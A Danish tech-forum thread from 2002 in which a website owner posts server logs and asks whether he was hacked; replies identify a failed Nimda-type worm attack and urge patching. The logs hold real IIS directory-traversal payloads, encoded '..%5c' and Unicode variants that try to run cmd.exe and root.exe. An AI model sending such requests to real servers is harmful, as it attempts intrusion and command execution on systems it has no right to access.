Søg
Avatar billede oersted-pedersen Nybegynder
22. december 2002 - 21:36 Der er 5 kommentarer og
2 løsninger

Er jeg blevet hacket ?!?!

Hej eksperter.
Faldt over noget underligt da jeg kiggede i min accesslog til min http server.
Normalt loggers der som følgende på alle der kommer ind på min hjemmeside:

80.199.20.120 - - [22/Dec/2002:21:25:58 +0100] "GET / HTTP/1.1" 304 0 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
80.199.20.120 - - [22/Dec/2002:21:25:58 +0100] "GET /Top_mainpage.htm HTTP/1.1" 304 0 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
80.199.20.120 - - [22/Dec/2002:21:25:58 +0100] "GET /Mainframe_mainpage.htm HTTP/1.1" 304 0 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
80.199.20.120 - - [22/Dec/2002:21:25:58 +0100] "GET /Menu_mainpage.htm HTTP/1.1" 304 0 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
80.199.20.120 - - [22/Dec/2002:21:25:58 +0100] "GET /Top_mainpage.htm?reload HTTP/1.1" 304 0 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
80.199.20.120 - - [22/Dec/2002:21:25:58 +0100] "GET /Mainframe_mainpage.htm?reload HTTP/1.1" 304 0 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
80.199.20.120 - - [22/Dec/2002:21:25:59 +0100] "GET /Menu_mainpage.htm?reload HTTP/1.1" 304 0 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"

Også er man ligesom på hovedsiden...

Men der er een IP der laver det her:

80.199.144.94 - - [22/Dec/2002:15:01:11 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:12 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:14 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:16 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:17 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:20 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:21 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:23 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:25 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:27 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:27 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:29 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:30 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:31 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:32 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:33 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"

Det er sket to gange fra samme IP.
Kigger jeg i selve serverloggen, står der det her: (Bemærk IP'en der går igen 80.199.144.94 og en IP der ikke figurerer i access loggen 217.81.215.130)

[22/Dec/2002:02:50:44 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:50:48 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:50:53 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:50:57 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:02 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:06 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:11 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:15 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:19 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:23 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:26 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:30 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:17 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:20 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:21 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:23 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:25 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:27 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:27 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:29 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:30 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:31 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:32 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:33 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:20:54:52 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:54:52 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:54:53 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:54:53 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:54:54 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:54:54 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:54:55 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:54:55 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:56:50 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:56:50 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:56:51 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:56:51 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:56:52 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:56:53 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:58:02 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:58:13 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)


Kan nogen fortælle mig hvad der er forgået her !?!?!?
Ved ikke om jeg skal være nervøs eller hvad..
Avatar billede prodic Mester
22. december 2002 - 21:40 #1
Det ligner umiddelbart et mislykket angreb fra f.eks Nimda-virussen.
Avatar billede bufferzone Praktikant
22. december 2002 - 21:42 #2
Det er et mislykkedes angrab af nimda typen, 'Du bør altid sørge for at holde dine servere opdaterede, både styresystemet og dine andre applikationer IIS, officepakker og andet. og så selvfølgelig holde øje med din log som du allerede har gjort. Dette bør ikke bekymre dig, men glæde dig at du har opdateret din server og dermed sluppet
Avatar billede oersted-pedersen Nybegynder
22. december 2002 - 21:52 #3
Ok... nu er jeg ikke så meget inde i selve server halløjet, mere hjemmesiderne.
Men skal handlingen fra accesloggen fra 80.199.144.94 ses som en commando man har forsøgt sendt hvorefter den i serverloggen registreres som mislykkedes (not allowed)?

Det eneste jeg som sådan sørger for at opdatere er mit antivirus og firewall.
Men de kan vel ikke beskytte hvis de går gennemserveren vel ?
Avatar billede bufferzone Praktikant
22. december 2002 - 22:01 #4
Nej ikke kun det. Det nimda og andre virus af samme slags gør er at forsøge at udnytte sikkerhedshuller i dit serversoftware, i dette tilfælde IIS. Ved at gennemføre windows Update ofte og patche både dit styresystem ig dine applikationer, sørger du for at derer så få huller som muligt. sikkerheds updateringer og servicepacks lukker sikkerhedshuller. Det du skal gøre er at opdatere din antivirus, opdatere dine firewalls, opdatere dit styresystem, opdatere dine applikationer.
Alle dine applikationer er vigtige, også officepakker, hvis du har et program kørende på din server og dette program har et hul, kan dette hul udnyttes.

opdater opdater opdater er der vigtigste du kan gøre
Avatar billede oersted-pedersen Nybegynder
22. december 2002 - 22:08 #5
Ok, jeg takker mange gange for forklaringerne :)
Avatar billede bufferzone Praktikant
22. december 2002 - 22:14 #6
Takker for point og vend bare tilbage hvis du har behov for yderligere forklaringer
Avatar billede oersted-pedersen Nybegynder
22. december 2002 - 22:17 #7
Det ka' du stole på jeg gør ;)
Go' jul *<|:o)=(||||||::::::¦
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
Se alle it-kurser fra Computerworld Kurser
IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.
Se alle it-kurser

Flere spørgsmål fra Andet sikkerhed kategorien

Titel Indlæg Oprettet Seneste aktivitet
hvilken afløser kan I anbefale? Af jcr18 i Andet sikkerhed 5 17/03/202610:32 18/03/202615:36
Advarsler om datalæk for nogle apps Af nu_igen i Andet sikkerhed 6 02/02/202614:54 03/02/202613:45
Mail fra Yousee ? Svindel? Af nu_igen i Andet sikkerhed 4 13/01/202617:27 14/01/202609:36
Er det sandsynligt, at jeg har været udsat for phishing Af Slettet bruger i Andet sikkerhed 4 13/11/202515:09 14/11/202510:45
Google fake Af johp i Andet sikkerhed 3 27/10/202516:31 28/10/202506:52
Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Opret Log ind

Du kan også logge ind via nedenstående tjenester

Alle kategorier på Eksperten
Seneste spørgsmål Seneste aktivitet
I går 19:38 Netkort finder 5 forbindelser,bare ikke min, Af valby i Internetforbindelser
I går 12:52 Installation af Outlook Classic Af mort1 i E-mail programmer
I går 12:08 Alt ender i skyen Af mort1 i Windows
I går 11:38 Væk fra Microsoft Launcher på min Android Af mort1 i Apps til Android
I går 09:20 TEMU vil installeres på min Samsung S10 Af mort1 i Apps til Android
White papers
Flere white papers »